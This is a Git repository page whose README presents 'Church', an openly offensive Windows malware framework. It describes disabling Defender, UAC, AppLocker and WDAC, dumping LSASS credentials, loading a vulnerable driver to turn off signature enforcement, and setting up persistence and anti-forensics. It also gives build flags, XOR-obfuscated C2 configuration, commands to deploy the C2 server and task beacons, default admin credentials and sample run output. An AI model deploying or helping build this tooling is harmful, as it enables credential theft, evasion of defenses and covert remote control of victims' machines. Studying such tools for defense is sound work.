k3nundrum/CHURCH
1
0
Fork 0
forked from ek0mssavi0r/CHURCH
Code Pull Requests Activity
WEAPONIZED BYPASS SYSTEM
14 Commits 1 Branch 0 Tags 137 KiB
C 64.9%
Python 35.1%
47d6e8e071
Go to file
ek0ms savi0r 47d6e8e071 Update church_final.c
2026-06-01 04:10:32 +00:00
c2_final.py Upload files to "/" 2026-06-01 03:30:33 +00:00
church_final.c Update church_final.c 2026-06-01 04:10:32 +00:00
LICENSE Initial commit 2026-06-01 02:00:34 +00:00
README.md Upload files to "/" 2026-06-01 03:44:41 +00:00

README.md

Church - Weaponized Windows Security Bypass Framework

    ╔═══════════════════════════════════════════════════════════════════════════╗
    ║                         CHURCH OF MALWARE                                 ║
    ║                  Enterprise Offensive Security Framework                  ║
    ║                         by ek0ms savi0r                                   ║
    ╚═══════════════════════════════════════════════════════════════════════════╝

Repository: https://git.churchofmalware.org/ek0mssavi0r/CHURCH/

DISCLAIMER FOR AUTHORIZED TESTING AND EDUCATIONAL PURPOSES ONLY

Overview

Church is an enterprise-grade Windows security bypass framework that implements multiple advanced techniques to disable or neutralize modern Windows security controls. The framework operates as a cohesive system executing in eight coordinated phases, providing complete offensive capabilities for authorized red team operations.

Core Capabilities

  • Windows Defender Tamper Protection via registry ownership takeover
  • Defender real-time protection, behavior monitoring, cloud protection, signature updates
  • User Account Control (UAC) via EnableLUA registry modification
  • AppLocker & Windows Defender Application Control (WDAC) via service disable and policy deletion
  • Driver Signature Enforcement (DSE) via vulnerable driver exploitation (gdrv.sys CVE-2018-19320)
  • Protected Process Light (PPL) via SeTcbPrivilege elevation and NtSetInformationProcess
  • Security event logging via MiniNt registry key
  • System restore points and telemetry domains via hosts file modification
  • Security services including Sense, SgrmBroker, WdBoot, WdFilter, WdNisDrv, SecurityHealthService, wscsvc, and 15+ others
  • LSASS credential dumping with hidden file attributes and shadow copy creation
  • Process hollowing and token stealing for privilege escalation
  • WMI event subscription for stealthy persistence
  • IFEO and Silent Process Exit for automatic payload execution

Execution Phases

Phase Operation Description
0 Telemetry Bypass ETW and AMSI in-memory patching
1 Core Protection Tamper Protection, Defender, UAC, AppLocker, WDAC
2 Anti-Forensics Exclusion addition, log disabling, restore point deletion, telemetry blocking
3 Persistence Scheduled tasks (x2), WMI events (x2), Run key, BootExecute, Winlogon, IFEO (x2), SilentProcessExit, Service
4 Service Elimination Stop and disable 18+ security services
5 Credential Access LSASS dump with hidden attribute, VSS shadow copy
6 Kernel Bypass gdrv.sys BYOVD, DSE disable
7 Process Protection PPL elevation via SeTcbPrivilege
8 C2 Activation AES-256 encrypted beacon with jitter, fallback servers

System Requirements

Target Environment

  • Windows 10 or Windows 11 (any edition)
  • Windows Server 2016/2019/2022
  • Administrator access required
  • Test system or authorized target only

Build Environment

  • Visual Studio 2019 or later with C compiler
  • Windows SDK 10.0.18362.0 or later
  • Windows 10/11 SDK or later

Required External File

Compilation Instructions

From Visual Studio Developer Command Prompt

cl /O2 /MT /Fe:church.exe church.c /link advapi32.lib user32.lib wbemuuid.lib ole32.lib crypt32.lib ntdll.lib bcrypt.lib ws2_32.lib winhttp.lib iphlpapi.lib shlwapi.lib shell32.lib

Compilation Flags for Production

Flag Purpose
/O2 Optimize for speed
/MT Static linking (no runtime DLLs)
/GS- Disable stack buffer security check (smaller binary)
/GL Whole program optimization
/Os Favor code size

Stripping Symbols (After Compilation)

strip --strip-all church.exe

Configuration

Edit church.c to configure C2 server settings before compilation:

// C2 Configuration
#define C2_BASE_INTERVAL_SECONDS 60      // Base beacon interval
#define C2_JITTER_MAX_SECONDS 120        // Random jitter added

// Obfuscated strings (XOR key 0xDD)
CHAR g_c2_server_obf[] = "\x78\x9D\x9D..."  // https://your-c2-server.com/beacon
CHAR g_aes_key_obf[] = "\xAB\xAA\xA8..."     // 32-byte AES-256 key
CHAR g_aes_iv_obf[] = "\xB1\xB8\xB7..."      // 16-byte AES IV

Replace the obfuscated strings with your own XOR-encrypted values using the provided key (0xDD). The C2 server expects matching AES keys.

C2 Server Deployment

Full APT-Grade C2 Server

# Install dependencies
pip install flask flask-socketio cryptography werkzeug

# Generate SSL certificate (for HTTPS)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Run the C2 server
python church_c2_server.py --host 0.0.0.0 --port 443

# Or with HTTP for testing
python church_c2_server.py --host 0.0.0.0 --port 8080 --http

C2 Server Features

Feature Description
AES-256-CBC Encryption All beacon traffic encrypted end-to-end
SQLite Database Persistent storage of beacons, tasks, results, credentials
WebSocket Real-time Live updates to web UI
Web UI Dashboard Modern terminal-style command interface
REST API Full programmatic control with JWT authentication
Task Queue Command queuing with output capture
Multi-session Handle hundreds of beacons simultaneously
Audit Logging Complete action history with timestamps
Beacon Management Track last seen, status, metadata, tags
Command Presets Quick common commands library
Stale Cleanup Auto-remove dead beacons after timeout
Credential Harvesting Store and categorize stolen credentials

C2 API Endpoints

# List all beacons
curl -H "X-Auth-Token: <JWT_SECRET>" https://localhost/api/beacons

# Execute command on beacon
curl -X POST -H "X-Auth-Token: <JWT_SECRET>" \
  -H "Content-Type: application/json" \
  -d '{"host": "beacon_id", "command": "whoami"}' \
  https://localhost/api/task

# Execute PowerShell command
curl -X POST -H "X-Auth-Token: <JWT_SECRET>" \
  -H "Content-Type: application/json" \
  -d '{"host": "beacon_id", "command": "Get-Process", "powershell": true}' \
  https://localhost/api/task

# Get beacon details
curl -H "X-Auth-Token: <JWT_SECRET>" \
  https://localhost/api/beacon/<beacon_id>

# Get task history
curl -H "X-Auth-Token: <JWT_SECRET>" \
  https://localhost/api/tasks/<beacon_id>

# Get system statistics
curl -H "X-Auth-Token: <JWT_SECRET>" \
  https://localhost/api/stats

Web UI Access

Navigate to https://c2-server:443 and log in with:

  • Username: admin
  • Password: CHURCHadmin2024!!

Execution

Run the compiled executable as Administrator:

church.exe

The tool auto-elevates if not already running with administrative privileges. The console provides real-time feedback on each phase:

[***] CHURCH OF MALWARE - FULL WEAPONIZED BYPASS [***]

=== PHASE 1: CORE PROTECTIONS ===
[+] Tamper Protection disabled
[+] WinDefend disabled
[+] Terminated MsMpEng.exe
[+] UAC disabled (reboot required)
[+] AppIDSvc disabled

=== PHASE 2: ANTI-FORENSICS ===
[+] Defender exclusions added
[+] Security logs disabled (MiniNt)
[+] System Restore disabled
[+] Telemetry blocked

=== PHASE 3: PERSISTENCE ===
[+] Scheduled task added
[+] IFEO persistence set
[+] BootExecute persistence added
[+] WMI persistence added

=== PHASE 4: SERVICE ELIMINATION ===
[+] Disabled Sense, SgrmBroker, WdBoot, WdFilter, WdNisDrv...

=== PHASE 5: CREDENTIAL ACCESS ===
[+] LSASS dumped to C:\lsass.dmp

=== PHASE 6: KERNEL BYPASS ===
[+] gdrv.sys loaded
[+] DSE disabled via gdrv

=== PHASE 7: PROCESS PROTECTION ===
[+] Process is now PPL

=== PHASE 8: C2 ACTIVATION ===
[+] C2 beacon active (interval: 60-180 sec)

[+] ALL PHASES COMPLETE
[!] REBOOT REQUIRED

After completion, the system reboots automatically.

x0 ek0ms